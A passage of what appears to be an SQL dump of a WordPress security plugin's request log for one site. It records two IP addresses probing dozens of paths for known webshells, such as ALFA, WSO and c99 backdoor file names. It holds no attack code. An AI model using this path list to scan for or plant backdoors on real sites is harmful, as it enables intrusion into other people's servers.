Zx5n2','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312357.5890,100,'qfpsjN1UMBeSKWC6kmgZ3LzA','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312360.9253,100,'MmzjJtOvSYVyDbkfeEc43B28','','13|0|0|0|www.dailyjolly.co.uk/.well-known/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312361.3132,100,'oKkuvFQPdXsT4qMBjryIlCYa','','13|0|0|0|www.dailyjolly.co.uk/.well-known/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312361.6903,100,'mYdViobnprxqfBZtQWCMwKO1','','13|0|0|0|www.dailyjolly.co.uk/.well-known/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312364.9744,100,'97Ux2dtzQTwM0vqjimEJyXPb','','13|0|0|0|www.dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312365.3137,100,'oDg7Yc2nehR0TCJkS4PZpLX1','','13|0|0|0|www.dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312365.6731,100,'Xb71Tz8fdglLRGnkAJPKvpM5','','13|0|0|0|www.dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312368.9551,100,'xYwa8LAXqCe9HzfR2btVO1I0','','13|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312369.2880,100,'KovV1NdBXqLHFSEex9lrhcmC','','13|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312369.6186,100,'Xyq8dRmGjah3F6Ap7CcS90eJ','','13|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312373.5861,100,'aC3dIVUc76trGNP2SOnxYmM1','','13|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312373.9407,100,'Q0WoBUfGAZrpwNmCS2njdyb6','','13|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312374.2824,100,'cBTXV2xRGWN6OFbLf48Kmndq','','13|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312377.8332,100,'z39PwFCbgicUyaJvomNRGdTQ','','13|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312378.1650,100,'MR6fWxPLHQsGnZ85IizD2V93','','13|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312378.5886,100,'wU4FGCnRsSENtL5iWT7bP2OB','','13|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312381.9029,100,'MpZ1AvJoXIlUqyz6gdrN7Ss5','','13|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312382.2987,100,'SD9PEvI08QNFRK7ZXtbyoldY','','13|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312382.6314,100,'82uDXn9TkoaYWFUzKjhQmypN','','13|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312386.1287,100,'OSMebVulkEh7ZjKswGypNXmC','','13|0|0|0|www.dailyjolly.co.uk/.tmb/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312386.4897,100,'QmP8apxtq0JHvgu9BkrC7NwW','','13|0|0|0|www.dailyjolly.co.uk/.tmb/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312386.8384,100,'saGeorLHkOZFu5hcMIXj2tP7','','13|0|0|0|www.dailyjolly.co.uk/.tmb/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312390.3209,100,'h20yBCknwivJdtNoaEcUQjfW','','13|0|0|0|www.dailyjolly.co.uk/.tmb/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312390.6850,100,'Si2rhCpBQbVMy9ZJ0aFDmwx1','','13|0|0|0|www.dailyjolly.co.uk/.tmb/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312391.0880,100,'dQrw3eqojzuyxJUXRgiNbVPG','','13|0|0|0|www.dailyjolly.co.uk/.tmb/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312395.3702,100,'9GYeLQTRaHNowWdF52hgUqcv','','13|0|0|0|www.dailyjolly.co.uk/.quarantine/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312395.7523,100,'x7f9yDrWU4NEXcaYAJt5LIBg','','13|0|0|0|www.dailyjolly.co.uk/.quarantine/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312396.1130,100,'qn93bUsMv4fCERpaIZ1OF2dX','','13|0|0|0|www.dailyjolly.co.uk/.quarantine/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312401.9129,100,'zQo97NHiS3laWIR4DK61Pyqj','','13|0|0|0|www.dailyjolly.co.uk/.quarantine/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312402.3638,100,'CPdVmb4NrR2gks8i0c9JXaD7','','13|0|0|0|www.dailyjolly.co.uk/.quarantine/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312402.8091,100,'4AfiqIHMv7ocNspjhTXynJ3d','','13|0|0|0|www.dailyjolly.co.uk/.quarantine/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312408.7598,100,'BhOi0YRKU9oIjzJ67mNcxFHe','','13|0|0|0|www.dailyjolly.co.uk/cgi-bin/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312409.2362,100,'uaTW8DpmrXFb6ACBkZlxnqSv','','13|0|0|0|www.dailyjolly.co.uk/cgi-bin/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312409.6711,100,'mefY78r93MDcliOoEyskjG4a','','13|0|0|0|www.dailyjolly.co.uk/cgi-bin/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312416.3505,100,'Pvs0XojBw5OK1l2xgM639NdF','','13|0|0|0|www.dailyjolly.co.uk/cgi-bin/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312416.7965,100,'DCg1XbiLsMuH6QV2TyoIOS8N','','13|0|0|0|www.dailyjolly.co.uk/cgi-bin/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312417.1551,100,'2YMzVymg1x4so8X9HlIe6LJa','','13|0|0|0|www.dailyjolly.co.uk/cgi-bin/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312421.3257,100,'EWL0tiDXVcNuI6qx41S7CF85','','13|0|0|0|www.dailyjolly.co.uk/images/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312421.8238,100,'MkqieXWmpZBgNScDYb3Hl5tJ','','13|0|0|0|www.dailyjolly.co.uk/images/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312422.1865,100,'HNF1mS0Xfg8aPAlzVExvT2ip','','13|0|0|0|www.dailyjolly.co.uk/images/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312427.0865,100,'cabli4hopgj6zQnZ8my1uB7N','','13|0|0|0|www.dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312427.4537,100,'IwlfxjMdL2esAntXBQERZkph','','13|0|0|0|www.dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312427.8272,100,'HtVmyaJ1hZe763zkb8iKqorT','','13|0|0|0|www.dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312433.4263,100,'m9orL8V1UegKck6MJihsQ0n3','','13|0|0|0|www.dailyjolly.co.uk/components/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312433.9823,100,'c5dAQmaOtsHrCUWPNKZj97iR','','13|0|0|0|www.dailyjolly.co.uk/components/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312434.4222,100,'vVLaHKJUF2tsxE86czSYPb9X','','13|0|0|0|www.dailyjolly.co.uk/components/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312439.6742,100,'GutbZEC8URo06Iepm9yzJncQ','','13|0|0|0|www.dailyjolly.co.uk/components/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312440.0839,100,'TvSV1PLDxWOIuleX4i9fpsrn','','13|0|0|0|www.dailyjolly.co.uk/components/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312441.9291,100,'xDojFJ1VhkLn825CNbYpHtSW','','13|0|0|0|www.dailyjolly.co.uk/components/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312446.4201,100,'9EXCbTkGHdSgiyUWcONDpl2x','','13|0|0|0|www.dailyjolly.co.uk/wordpress/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312446.8489,100,'aIe2NrBC6gnch9jfM8Gpqk3T','','13|0|0|0|www.dailyjolly.co.uk/wordpress/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312447.2259,100,'JizNqCLQD6Tw31uh0Kga4tc9','','13|0|0|0|www.dailyjolly.co.uk/wordpress/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312452.5857,100,'BoJR12eEu7WXDQpMVzdIj83a','','13|0|0|0|www.dailyjolly.co.uk/wordpress/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312452.9550,100,'5S7RJHs6twPDZLg23ouea0yM','','13|0|0|0|www.dailyjolly.co.uk/wordpress/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312453.3894,100,'Fmnvh5VW0abXMsp29JDCcxwQ','','13|0|0|0|www.dailyjolly.co.uk/wordpress/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312458.1301,100,'qh8mrWP7kbUdGaw1YSHCgflK','','13|0|0|0|www.dailyjolly.co.uk/wp/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312458.5074,100,'0nubJ82wSsPGXFHf4Te7lOtI','','13|0|0|0|www.dailyjolly.co.uk/wp/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312458.8696,100,'4ABkOrbD5PFoVqn973tRcHei','','13|0|0|0|www.dailyjolly.co.uk/wp/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312463.6948,100,'TLrBWsI34l7jvVdN9pGH8Czm','','13|0|0|0|www.dailyjolly.co.uk/wp/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312464.1050,100,'KNqHjms1UQvBF8GwzL2aRWTV','','13|0|0|0|www.dailyjolly.co.uk/wp/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312464.4952,100,'hqaiE9P2by8QmxvYLT7JpVWr','','13|0|0|0|www.dailyjolly.co.uk/wp/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312470.0167,100,'sbWiot3jATZPr1MyHRqzCxlc','','13|0|0|0|www.dailyjolly.co.uk/blog/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312470.4248,100,'RCfZDyM68uwLEeTOqBASmF4k','','13|0|0|0|www.dailyjolly.co.uk/blog/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312470.8193,100,'fhk7cqZ9MLPEoz1AbUXwTGel','','13|0|0|0|www.dailyjolly.co.uk/blog/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312477.1523,100,'SEG9oNXsgtRLTqUj80YHPV7Z','','13|0|0|0|www.dailyjolly.co.uk/blog/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312477.6036,100,'ATunyGPwlfsk7NYaFW6d0b8v','','13|0|0|0|www.dailyjolly.co.uk/blog/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312477.9708,100,'NFQrOme4An5Eo3d0zYI2ijup','','13|0|0|0|www.dailyjolly.co.uk/blog/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312483.3552,100,'tUBwh3rSCFfMR5DYdITkv4mX','','13|0|0|0|www.dailyjolly.co.uk/new/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312483.7596,100,'pGqVf5uxWdYvDEbAOwIRPHmo','','13|0|0|0|www.dailyjolly.co.uk/new/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312484.1121,100,'MqVlbXnsi08gmZcFBhPrNe3A','','13|0|0|0|www.dailyjolly.co.uk/new/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312488.1865,100,'aohUdzltKngH9LYQqVJXC5ys','','13|0|0|0|www.dailyjolly.co.uk/new/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312488.5653,100,'nUEgri2eohWaCGFjD6lQ8fAX','','13|0|0|0|www.dailyjolly.co.uk/new/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312488.9373,100,'k7WsaHbruovTUicM15JKjfnt','','13|0|0|0|www.dailyjolly.co.uk/new/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312499.0518,100,'yeCKchdzSmlV5wYU9H260i1Q','','13|0|0|0|www.dailyjolly.co.uk/old/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312499.4979,100,'PljRUMWK1y2Ea8fLYsvxrS49','','13|0|0|0|www.dailyjolly.co.uk/old/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312499.9003,100,'kn2YjlJHSzuL9d03bNT5EaoP','','13|0|0|0|www.dailyjolly.co.uk/old/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312504.8881,100,'Rzs3W2KFbSTkjBEDLHMh7tC6','','13|0|0|0|www.dailyjolly.co.uk/old/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312505.2798,100,'LxjTncIhmlkJtOfzZdo2G5v7','','13|0|0|0|www.dailyjolly.co.uk/old/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312505.7412,100,'WAJp1Q2EYVhUdXMtqbkDfiCc','','13|0|0|0|www.dailyjolly.co.uk/old/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312511.1810,100,'8Qn6i9xVu4zlGpUNFtyjmHeX','','13|0|0|0|www.dailyjolly.co.uk/backup/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312511.6450,100,'wzMBxDyoHlCc157sGa9KUedp','','13|0|0|0|www.dailyjolly.co.uk/backup/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312512.0089,100,'1Wnx7aF6Xv2iLOEDUZ0kyMQJ','','13|0|0|0|www.dailyjolly.co.uk/backup/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312518.3220,100,'IvGMXpmycRuDd1W07BwK4QrE','','13|0|0|0|www.dailyjolly.co.uk/backup/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312518.7316,100,'XafTVSn5u3CliJUWQNG1kg8m','','13|0|0|0|www.dailyjolly.co.uk/backup/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312519.2171,100,'1B2GXTdILp8skJPhe3yUlNj4','','13|0|0|0|www.dailyjolly.co.uk/backup/ALFA_DATA/alfacgiapi/404.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319210.9740,55,'0lYweUyvQMpB6ubqAtakN8fO','','19|0|0|0|dailyjolly.co.uk/1index.php',0,19,0),('216.226.146.228',3638727396,'',0,1674319212.7633,55,'qj394XR6x0w2T5vncDKaidOE','','19|0|0|0|dailyjolly.co.uk/11index.php',0,19,0),('216.226.146.228',3638727396,'',0,1674319218.4138,55,'TmqG4V8uMEwNUJ7aXvjKxsi5','','19|0|0|0|dailyjolly.co.uk/2index.php',0,19,0),('216.226.146.228',3638727396,'',0,1674319224.0237,55,'DlHsVtCS9zhi4fx6YP7bckQr','','19|0|0|0|dailyjolly.co.uk/3index.php',0,19,0),('216.226.146.228',3638727396,'',0,1674319230.0164,55,'xOv2gYcJLrCF9moqtMRQWHau','','19|0|0|0|dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('216.226.146.228',3638727396,'',0,1674319230.0669,10,'xOv2gYcJLrCF9moqtMRQWHau','','707|0|0|0|dailyjolly.co.uk/wp_wrong_datlib.php',0,707,0),('216.226.146.228',3638727396,'',0,1674319232.7723,100,'5tBa4jTwg0slG6JWzrqdoKHu','','13|0|0|0|dailyjolly.co.uk/wp-adminincludesclass-wp-media-list-data.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319234.9973,100,'1PJ7BRAikQYet4srSxCzZ3Th','','13|0|0|0|dailyjolly.co.uk/autoload_classmap.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319237.0445,100,'tE0RPsAb85alwWDGqXz2rMCp','','13|0|0|0|dailyjolly.co.uk/wso.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319240.8209,100,'nu0iwZrt9vUTcpyL1X3qVasf','','13|0|0|0|dailyjolly.co.uk/doc.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319247.3466,100,'dnuV630x5ryet7OJYSZ9bLCf','','13|0|0|0|dailyjolly.co.uk/stindex.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319249.7777,100,'HIk6pPViTb5UXJSWlAemYFEx','','13|0|0|0|dailyjolly.co.uk/alwso.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319251.8869,100,'XUFBsq07cDmzurVGZoHS38Mj','','13|0|0|0|dailyjolly.co.uk/ups.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319254.6879,100,'9pqbgyTQ5m0YNkDz7FLE2Bla','','13|0|0|0|dailyjolly.co.uk/media-admin.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319258.3256,100,'3urplAFToSzPMy619ejXt7gZ','','13|0|0|0|dailyjolly.co.uk/sym.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319260.5480,100,'kNdyUOg9Ca4ujh8X72qKzlZL','','13|0|0|0|dailyjolly.co.uk/sym403.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319266.6386,100,'qx6hHEOSApg5wuZmjob3eM47','','13|0|0|0|dailyjolly.co.uk/fw.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319271.0541,100,'yKOilR49vXSQrGgaMjENWPqz','','13|0|0|0|dailyjolly.co.uk/symlink.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319275.8442,100,'7RfrY0qdpWjGbuo824A1wZ9F','','13|0|0|0|dailyjolly.co.uk/shell.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319278.6427,100,'Ngd14WQauYMRGm8lwiHv0nZ2','','13|0|0|0|dailyjolly.co.uk/1.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319280.5442,100,'XypztLn2QUf6NKZFgPOvjkR4','','13|0|0|0|dailyjolly.co.uk/data.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319282.7958,100,'hTOGeX29rKP4i1nqvlQ57kzS','','13|0|0|0|dailyjolly.co.uk/wp-blog.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319285.7259,100,'Y2sPxNUJ1Vkgwi94Kfn8bpE3','','13|0|0|0|dailyjolly.co.uk/b.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319288.0895,100,'OlsPY7mwXWgF0JLizpKZv8EB','','13|0|0|0|dailyjolly.co.uk/c.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319290.1148,100,'T4QhVNmEKv0PYGXr8iDgcxzt','','13|0|0|0|dailyjolly.co.uk/shx.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319293.7875,100,'X9Vafrb368voTi2BPjh7IKJS','','13|0|0|0|dailyjolly.co.uk/alfa.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319295.3112,100,'siNOJZ2qQoEYDh9I0elLAbW6','','13|0|0|0|dailyjolly.co.uk/a.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319297.7732,100,'sejYFGhZ92iBCro4wHAPOfMd','','13|0|0|0|dailyjolly.co.uk/old-index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319301.6228,100,'5SDakJxiqEZuUIHzFpRLYNPX','','13|0|0|0|dailyjolly.co.uk/FoxWSO.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319306.0018,100,'BrYfM6mi9nNyEpd8C4joaUh0','','13|0|0|0|dailyjolly.co.uk/x.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319307.4104,100,'bEYnzxA0fmtSUc4ZGkOFdqWQ','','13|0|0|0|dailyjolly.co.uk/403.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319309.9966,100,'ruJpDUENKYmALf2xetGXIZsl','','13|0|0|0|dailyjolly.co.uk/mini.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319312.0583,100,'Vl7IbEUc93Tj0ZxQHtuG2hry','','13|0|0|0|dailyjolly.co.uk/imagesvuln.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319315.0571,100,'2LSNVUhGIndQDYTapKfbc301','','13|0|0|0|dailyjolly.co.uk/edit-form.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319317.5266,100,'zlIgdxZvR26CtFfV375rLXHG','','13|0|0|0|dailyjolly.co.uk/wikindex.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319323.2340,100,'sz3iGI6dKDTpX8btOQACFBfZ','','13|0|0|0|dailyjolly.co.uk/m.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319326.6374,100,'2tdfDB5mbMJhPkvCcYxXrV8Q','','13|0|0|0|dailyjolly.co.uk/0byte.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319328.8815,100,'xiDZRo1pnTNkh8ePJGYu23AS','','13|0|0|0|dailyjolly.co.uk/xx.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319331.1141,100,'2VdSTvYeGRclsJDhuH7tbjUy','','13|0|0|0|dailyjolly.co.uk/new-index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319334.8664,100,'QpjbyDKMJcI0rAtNkwfFRo97','','13|0|0|0|dailyjolly.co.uk/wp.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319338.4714,100,'gGYCjZ53IdncfXSRitau9xry','','13|0|0|0|dailyjolly.co.uk/wp-wso.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319341.1501,100,'RzAaHrulCKVOmenDE13PLdb9','','13|0|0|0|dailyjolly.co.uk/qindex.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319345.5832,100,'Cw4eHVuUqW6Bd5K9QXn3sNEf','','13|0|0|0|dailyjolly.co.uk/priv8.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319348.8413,100,'V5Upzj3xBMnJETOQRy1tYWiZ','','13|0|0|0|dailyjolly.co.uk/minimo.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319354.7332,100,'e0MzjQg9X7Wsn4rtTB1lOuxH','','13|0|0|0|dailyjolly.co.uk/xleet.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319356.6016,100,'Kq6izU9nd3cgMIJlmvYyaTHZ','','13|0|0|0|dailyjolly.co.uk/V3.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319360.4345,100,'cTs3gA6luiaz9ZKXnfh2F5Gp','','13|0|0|0|dailyjolly.co.uk/V5.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319362.2574,100,'d4D7L1pwFlCbu6WtNsRvaVxi','','13|0|0|0|dailyjolly.co.uk/404.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319364.4369,100,'qB2X4hTtV1Ib7rUlZmiP63nD','','13|0|0|0|dailyjolly.co.uk/up.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319366.8281,100,'zsCT5EYVigWDrRJLb0XyNB2a','','13|0|0|0|dailyjolly.co.uk/www.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319371.8765,100,'J0zytFq8RNXnoAWdYLk6w5US','','13|0|0|0|dailyjolly.co.uk/100.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319375.5214,100,'F5iqXExIowcZkdH9CsT2rVnK','','13|0|0|0|dailyjolly.co.uk/777.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319385.6481,100,'T7Lkm3CZ4Njch2KOqA6XzyVp','','13|0|0|0|dailyjolly.co.uk/defau1t.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319391.0693,100,'04W9S7zZmDPFkYp8bdEiLeVu','','13|0|0|0|dailyjolly.co.uk/f.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319393.0732,100,'SlsAnVgueDRHoyfzFdacGW2O','','13|0|0|0|dailyjolly.co.uk/xox.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319395.1979,100,'HiajNK6eObcY8RZSuygQC41G','','13|0|0|0|dailyjolly.co.uk/o.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319397.1490,100,'KGjrfW0Ap3xgVihXSPIcN514','','13|0|0|0|dailyjolly.co.uk/new.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319402.1588,100,'VsibIjfZPQt0SMxpNz9FAREg','','13|0|0|0|dailyjolly.co.uk/sindex.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319403.9968,100,'bCy9WsQfthXYJwVuM5KD1ekN','','13|0|0|0|dailyjolly.co.uk/baindex.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319407.5156,100,'ltwrnejJ9ABbWNYOvxFcfQEd','','13|0|0|0|dailyjolly.co.uk/wi.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319411.7123,100,'xc2y7wf49YI0FPRHGmnV5QUW','','13|0|0|0|dailyjolly.co.uk/mar.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319417.0430,100,'Y5l6DsZqok29zpTmC4E7wIvB','','13|0|0|0|dailyjolly.co.uk/root.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319418.4556,100,'mFtqvIZ5rTPl4YWGK760wVao','','13|0|0|0|dailyjolly.co.uk/nee.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319424.5179,100,'CbsKrqMBzymQjPRhWEVAftkg','','13|0|0|0|dailyjolly.co.uk/v.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319427.1059,100,'gEspTvtaqrJPo2eLVXzD3YCk','','13|0|0|0|dailyjolly.co.uk/z.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319428.4825,100,'nCMqbFJTQ648W0YxPyG37sKB','','13|0|0|0|dailyjolly.co.uk/g.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319431.8842,100,'le61Y2wutBJ5obAITz8ND3qE','','13|0|0|0|dailyjolly.co.uk/c99.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319433.4915,100,'d4OS3Zhz0mB7gtK5TrGeDvYX','','13|0|0|0|dailyjolly.co.uk/w.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319437.5236,100,'HQVi01GKl8zaLqO2wZUhvmMP','','13|0|0|0|dailyjolly.co.uk/ws.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319438.7913,100,'e4vwcNKi1kUG35fFAbOlgYzP','','13|0|0|0|dailyjolly.co.uk/2.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319440.8014,100,'3ikvVtwua7TzqIGQfZXBo5pO','','13|0|0|0|dailyjolly.co.uk/lol.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319442.9367,100,'ouLStHEWd2ZK5CTArGBfybwY','','13|0|0|0|dailyjolly.co.uk/87.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319444.4586,100,'qJ4QYHfBvhruaNbclg2SOxeC','','13|0|0|0